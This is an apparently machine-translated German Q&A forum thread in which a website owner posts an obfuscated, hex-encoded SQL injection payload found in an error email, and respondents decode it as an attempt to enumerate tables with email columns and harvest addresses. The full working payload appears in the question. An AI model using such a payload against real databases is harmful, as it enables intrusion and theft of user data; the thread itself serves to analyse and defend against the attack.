2016-11-25 1 views
1

Ich habe eine Website. Wenn es Fehler gibt, sende ich eine E-Mail an ein Systemkonto. Ich sehe heute folgendes, von dem ich annehme, dass es das SQL war. Ich werde eine Reparatur machen müssen. Würde jemand wissen, was die Person damit erreichen wollte?Was ist der Zweck dieser Art von SQL-Injektion?

AdID=50427 or 1=(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x25656d61696c25 and not t./**/tAbLe_nAmE in(0x42524944455f54424c,0x42524944455f54424c5f505542,0x434f4e54414354,0x434f4e544143545f54424c,0x47524f4f4d5f54424c,0x47524f4f4d5f54424c5f505542,0x4f524445525f54424c,0x7068703132315f75736572735f64656c65746564,0x535542534352494245525f4c495354,0x555345525f44454c45544544,0x555345525f50524f46494c455f44454c45544544) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 11,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and 1=1 
+0

Es sieht so aus, als wollten sie die Liste der Tabellen abrufen, damit sie weitere Angriffe planen können. –

+2

0x25656d61696c25 ist% email%, also eine Liste von Spalten, die möglicherweise E-Mail-Adressen enthalten; dann können sie sie verkaufen/phishing gehen. –

+0

@GarethLyons Ah, richtig. Ich war eins in meiner Kolumnenzählung, korrigiert in meinem Post jetzt. – RBarryYoung

Antwort

1

Insbesondere wird versucht, die Nicht-Systemtabellen haben eine Säule, die email und wird mit Ausnahme der folgenden Tabellen zu finden:

BRIDE_PUB 
BRIDE_TBL_PUB 
CONTACT 
CONTACT_TBL 
GROOM_TBL 
GROOM_TBL_PUB 
ORDER_TBL 
php121_users_deleted  
SUBSCRIBER_LIST 
USER_DELETED  
USER_PROFILE_DELETED 

Welche Ich gehe davon aus, den Angreifer schon kennt.

Im Grunde versuchen sie Ihre E-Mail-Adressen zu stehlen, um sie als Mailinglisten zu verkaufen (das ist typisch für SQL-Injection-Angriffe).


FYI, hier ist die Abfrage, die ich die Saiten sehen verwendet, um:

select 
    CAST(0x217e21 as varchar(99)), 
    CAST(0x696e666f726d6174696f6e5f736368656d61 as varchar(99)), 
    CAST(0x6d7973716c as varchar(99)), 
    CAST(0x25656d61696c25 as varchar(99)), 
    CAST(0x42524944455f54424c as varchar(99)), 
    CAST(0x42524944455f54424c5f505542 as varchar(99)), 
    CAST(0x434f4e54414354 as varchar(99)), 
    CAST(0x434f4e544143545f54424c as varchar(99)), 
    CAST(0x47524f4f4d5f54424c as varchar(99)), 
    CAST(0x47524f4f4d5f54424c5f505542 as varchar(99)), 
    CAST(0x4f524445525f54424c as varchar(99)), 
    CAST(0x7068703132315f75736572735f64656c65746564 as varchar(99)), 
    CAST(0x535542534352494245525f4c495354 as varchar(99)), 
    CAST(0x555345525f44454c45544544 as varchar(99)), 
    CAST(0x555345525f50524f46494c455f44454c45544544 as varchar(99)) 

(Ich tat dies auf MS SQL Server, nicht sicher, ob die Syntax ist genau das gleiche auf MySql)

+1

Es ist möglich, dass die von der Sicherheitsanfälligkeit ausgehende Ausgabe nur aus einer einzelnen Zeile oder einer festen Anzahl von Zeilen besteht. Daher ist das Hinzufügen von Ausschlüssen eine Möglichkeit für den Angreifer, die verbleibenden Zeilen zu sehen. – IMSoP

+0

Danke. Ich habe etwas zu tun. – user3371970

+0

@RBarryYoung - Ich bin diesbezüglich nicht sehr technisch. Wie konnten Sie die Tabellennamen kennen? – user3371970